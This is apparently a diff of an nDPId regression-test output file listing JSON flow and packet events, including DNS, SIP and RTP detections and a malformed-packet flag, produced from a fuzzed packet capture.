00618{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":615,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":195,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470781608,"flow_last_seen":1120470781608,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470975858,"l3_proto":"ip4","src_ip":"192.168.170.170","dst_ip":"170.170.170.170","src_port":43690,"dst_port":43690,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00603{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":615,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":195,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470781608,"flow_last_seen":1120470781608,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470975858,"l3_proto":"ip4","src_ip":"192.168.170.170","dst_ip":"170.170.170.170","src_port":43690,"dst_port":43690,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":615,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":193,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1120470775129,"flow_last_seen":1120470779409,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120470975858,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2794,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":615,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":192,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1120470775049,"flow_last_seen":1120470779408,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":188,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1120470975858,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2795,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":615,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":193,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1120470775129,"flow_last_seen":1120470779409,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120470975858,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2794,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":615,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":192,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1120470775049,"flow_last_seen":1120470779408,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":188,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1120470975858,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2795,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00593{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":615,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":196,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470788806,"flow_last_seen":1120470788806,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470975858,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.129","src_port":2796,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":615,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":194,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470779487,"flow_last_seen":1120470782692,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470975858,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2796,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":615,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":230,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470983860,"flow_last_seen":1120470983860,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470983860,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2815,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00506{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":615,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":230,"flow_packet_id":1,"flow_last_seen":1120470983860,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1120470983860,"pkt":"ADBUADRWAODtAW69CABFAABEa\/cAAIARS17AqAECwKgBAQr\/ADUAMJu6iQWqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="} -00878{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":615,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":230,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470983860,"flow_last_seen":1120470983860,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470983860,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2815,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":170,"num_answers":254,"reply_code":10,"query_type":0,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00878{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":615,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":230,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470983860,"flow_last_seen":1120470983860,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470983860,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2815,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":170,"num_answers":254,"reply_code":10,"query_type":0,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00216{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":616,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":71,"global_ts_msec":1120470983861} 00425{"packet_event_id":1,"packet_event_name":"packet","packet_id":616,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":105,"pkt_l4_len":0,"thread_ts_msec":1120470983860,"pkt":"AODtam69ADBUADRWCABFAABLAABcAEARtz7AqAEBhagBAgA1Cv8AR342iQWAAAABAAEAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAcAMAAwAAQAAJxAACwlsb2NhbGhvc3QA"} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":618,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470983999,"flow_last_seen":1120470983999,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470983999,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2816,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":618,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":231,"flow_packet_id":1,"flow_last_seen":1120470983999,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470983999,"pkt":"ADBUADRWAODtAW69CABFAABIa\/kAAIARS1jAqAECwKgBAQsAADUANFW+1AYBAAABAAAAAAAABOxzaXAEX3VkcANzaHAJY3liZXJjaXR5AmRrAAAhAAE="} -00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":618,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470983999,"flow_last_seen":1120470983999,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470983999,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2816,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"?sip._udp.shp.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":618,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470983999,"flow_last_seen":1120470983999,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470983999,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2816,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"?sip._udp.shp.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":622,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":232,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470984353,"flow_last_seen":1120470984353,"flow_idle_time":200000,"flow_min_l4_payload_len":324,"flow_max_l4_payload_len":324,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":324,"midstream":0,"thread_ts_msec":1120470984353,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.201","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00884{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":622,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":232,"flow_packet_id":1,"flow_last_seen":1120470984353,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":366,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":366,"pkt_l4_len":332,"thread_ts_msec":1120470984353,"pkt":"ADBUADRWAODt4G69CABFAAFga\/oAAIARFdPAqAEC1PIhyRPEE8QBRC7GQUNLIHNpcDozNTEwNDcwNEBzaXAuY3liZXJjaXR5LmRrIFNJUC8yLjANCkZyb206ICJhcmlrIiA8c2lwOjM1MTA0qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq"} -00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":622,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":232,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470984353,"flow_last_seen":1120470984353,"flow_idle_time":200000,"flow_min_l4_payload_len":324,"flow_max_l4_payload_len":324,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":324,"midstream":0,"thread_ts_msec":1120470984353,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.201","src_port":5060,"dst_port":5060,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} +00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":622,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":232,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470984353,"flow_last_seen":1120470984353,"flow_idle_time":200000,"flow_min_l4_payload_len":324,"flow_max_l4_payload_len":324,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":324,"midstream":0,"thread_ts_msec":1120470984353,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.201","src_port":5060,"dst_port":5060,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":623,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":231,"flow_packet_id":2,"flow_last_seen":1120470985234,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470985234,"pkt":"ADBUADTZAODtAW69CABFAABIa\/sAAIARS1bAqAECwKgBAQsAADUANFW+1AYBAAABAAAAAAAABF9zaXAEX3VkUQNzaXAJY3liZXJjaXR5AmRrAAAhAAE="} -00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":623,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470983999,"flow_last_seen":1120470985234,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470985234,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2816,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udq.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":623,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470983999,"flow_last_seen":1120470985234,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470985234,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2816,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udq.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00600{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":624,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":233,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470985348,"flow_last_seen":1120470985348,"flow_idle_time":200000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1120470985348,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"212.242.33.36","src_port":30000,"dst_port":40392,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00685{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":624,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":233,"flow_packet_id":1,"flow_last_seen":1120470985348,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1120470985348,"pkt":"ADBUADRWAODtAW69CABFAADIa\/wAAIARFmjAqAED1PIhJHUwncgAHRjegAhvrgAABNg3lstx1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1U\/V1dXV1REEHBgYEhIeEBQXahMcGAQEBQYBAQAHBQUZEwUbGRATGQUEBAcDAgMDAAACDQ0NAAEDDQwNAAABAgMBBgYBDw4eDAMABwYAAwMGBwEEBgYbHxwRaWBiFBEQFGoTFWBpYX10UltZ10dcVlJVREtCdatzeFp8bmgUag=="} -00656{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":624,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":233,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470985348,"flow_last_seen":1120470985348,"flow_idle_time":200000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1120470985348,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"212.242.33.36","src_port":30000,"dst_port":40392,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"RTP","breed":"Acceptable","category":"Media"}} +00656{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":624,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":233,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470985348,"flow_last_seen":1120470985348,"flow_idle_time":200000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1120470985348,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"212.242.33.36","src_port":30000,"dst_port":40392,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"RTP","breed":"Acceptable","category":"Media"}} 00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":625,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":234,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470985418,"flow_last_seen":1120470985418,"flow_idle_time":200000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1120470985418,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"37.115.0.36","src_port":30000,"dst_port":40392,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00686{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":625,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":234,"flow_packet_id":1,"flow_last_seen":1120470985418,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1120470985418,"pkt":"ADBUNjRWAODtAW69CABFAADIa\/0AAIARFmfAqAECJXMAJHUwncgAtL+rgAhvrwAABXg3lstxbmgVFGoUFBVpYG5qbG5kbGoWF2xubWBmfn9Fxsnw\/Ofz+uXwy+phC83k+sJTdF9CW\/bw8vzg7pfo8ldaT011Z399ZmV0dUN4S0dVQ2dmbWNsZGZkeGRvbxQUbBcRExAXEBwfHRAQFhAQHxwfGR4YEBcSFGxibWNqFRUXbmV3ckDQ93N9fmJnYmoVahcVZa9xWll+YGZ6cnJJZXpgeF1EQg=="} -00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":625,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":234,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470985418,"flow_last_seen":1120470985418,"flow_idle_time":200000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1120470985418,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"37.115.0.36","src_port":30000,"dst_port":40392,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"RTP","breed":"Acceptable","category":"Media"}} +00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":625,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":234,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470985418,"flow_last_seen":1120470985418,"flow_idle_time":200000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1120470985418,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"37.115.0.36","src_port":30000,"dst_port":40392,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"RTP","breed":"Acceptable","category":"Media"}} 00600{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":626,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":235,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470985421,"flow_last_seen":1120470985421,"flow_idle_time":200000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1120470985421,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.36","src_port":30000,"dst_port":40392,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00687{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":626,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":235,"flow_packet_id":1,"flow_last_seen":1120470985421,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1120470985421,"pkt":"ADBUADRWAODtAW69CABFAADIa\/4AAIARFmbAqAEC1PIhJHUwncgAtNyMgGNvsAAABhg3lstxcX5wdvzF0Et0dn92T1BB0VhmZ2V\/Z294Y2ZmahQXFhQREBAVb2ZPemVlYWJoYE9\/YWZkcnV4bWwVFRVqZ2xpYn94ZmBnY2F0zfjXdmNiYXhveHJgaW5jUFlwZTFkYc9lamoREhAQEx4fHx0XahRvRl1F3V5ESXjQxFFR39TfQXR\/Z9L15ebs6JeW7+DslJOU6uqUn5CcnJKX+Ofs5+Hg6g=="} -00656{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":626,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":235,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470985421,"flow_last_seen":1120470985421,"flow_idle_time":200000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1120470985421,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.36","src_port":30000,"dst_port":40392,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"RTP","breed":"Acceptable","category":"Media"}} +00656{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":626,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":235,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470985421,"flow_last_seen":1120470985421,"flow_idle_time":200000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1120470985421,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.36","src_port":30000,"dst_port":40392,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"RTP","breed":"Acceptable","category":"Media"}} 00684{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":627,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":235,"flow_packet_id":2,"flow_last_seen":1120470985427,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1120470985427,"pkt":"ADBUADRWAODtAW69CABFAADIa\/8AAIARFmXAqAEC1PIhJHUwncgAtJlvgAhvsQAABrg3lstxkpfo6Zfq5frn5uz6+gt4emFkcGBneMvv7+rslZHuqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="} 00689{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":628,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":235,"flow_packet_id":3,"flow_last_seen":1120470985429,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1120470985429,"pkt":"ADBUADRWAODtAW69CABFAADIbAAAAIARFmTAqAEC1PIhJHUwncgAtMoSgAhvsgAABVg3lstxRH1wXN719vLg7uHxw3h4ZHZhfE9UWV\/RzzPt5\/PklJOUlJXt4uzx+Pjm5vPHzf38\/fr05+3ikurj4ezn4+H6\/97AwEJ8S9DN9Vd1XdzJ8eDp6eXwzcXWRUJnZHhnYX96aHLW+ubo6eHg5\/DG\/MNRcE3B+ubNy+Xu7Obt7+qX4+7oy9fw3vLT3N1W19X49PBBf39jZnhmbBEdEWpqb2BweA=="} 